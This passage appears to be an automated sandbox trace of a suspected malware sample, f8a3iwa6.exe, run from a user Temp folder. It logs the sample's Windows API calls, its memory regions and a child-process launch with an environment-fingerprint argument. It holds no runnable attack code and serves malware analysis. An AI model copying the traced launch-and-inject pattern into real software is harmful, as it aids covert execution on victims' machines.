EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, 
[186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, 
[367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0108.238] ResumeThread (hThread=0x48) returned 0x1 [0108.238] CloseHandle (hObject=0x48) returned 1 [0108.238] CloseHandle (hObject=0x4c) returned 1 [0108.238] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.238] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0108.238] ExitProcess (uExitCode=0x0) Process: id = "32" image_name = 
"f8a3iwa6.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe" page_root = "0x7ea16760" os_pid = "0xcac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0xc8c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4908 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4909 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4910 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 4911 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "f8a3iwa6.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe") Region: id = 4912 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4913 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4914 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4915 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 4916 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 4917 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4918 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4919 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4920 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4921 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4922 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4923 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4924 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 
region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4925 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4926 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4927 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4928 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4929 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 4930 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4931 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5004 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5005 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5006 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000490000" filename = "" Region: id = 5007 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 5008 start_va = 0x11a0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 5131 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5132 start_va = 0x12d0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 5277 start_va = 0x11a0000 end_va = 0x127efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 5278 start_va = 0x12c0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 5279 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5280 start_va = 0x390000 end_va = 0x392fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 5281 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Thread: id = 50 os_tid = 0xcb0 [0108.144] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x7e768c00, dwHighDateTime=0x1d440a9)) [0108.144] GetCurrentProcessId () returned 0xcac [0108.144] GetCurrentThreadId () returned 0xcb0 [0108.144] GetTickCount () returned 0x25e06 [0108.144] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: 
lpPerformanceCount=0x12ff74*=16493315259) returned 1 [0108.144] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0108.144] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.145] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0108.145] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0108.145] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0108.145] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0108.145] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0108.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0108.146] GetCurrentThreadId () returned 0xcb0 [0108.146] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x12c07d0)) [0108.147] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0108.147] GetFileType (hFile=0x3) returned 0x0 [0108.147] 
GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0108.147] GetFileType (hFile=0x7) returned 0x0 [0108.147] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0108.147] GetFileType (hFile=0xb) returned 0x0 [0108.147] SetHandleCount (uNumber=0x20) returned 0x20 [0108.147] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.147] GetEnvironmentStringsW () returned 0x1cfcf8* [0108.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0108.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x12c11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0108.147] FreeEnvironmentStringsW (penv=0x1cfcf8) returned 1 [0108.147] GetLastError () returned 0x6 [0108.147] SetLastError (dwErrCode=0x6) [0108.147] GetLastError () returned 0x6 [0108.147] SetLastError (dwErrCode=0x6) [0108.147] GetLastError () returned 0x6 [0108.147] SetLastError (dwErrCode=0x6) [0108.147] GetACP () returned 0x4e4 [0108.147] GetLastError () returned 0x6 [0108.147] SetLastError (dwErrCode=0x6) [0108.147] IsValidCodePage (CodePage=0x4e4) returned 1 [0108.147] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0108.147] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0108.148] GetLastError () returned 0x6 [0108.148] SetLastError (dwErrCode=0x6) [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, 
cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0108.148] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0108.148] GetLastError () returned 0x6 [0108.148] SetLastError (dwErrCode=0x6) [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ") returned 256 [0108.148] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0108.148] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0108.148] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\x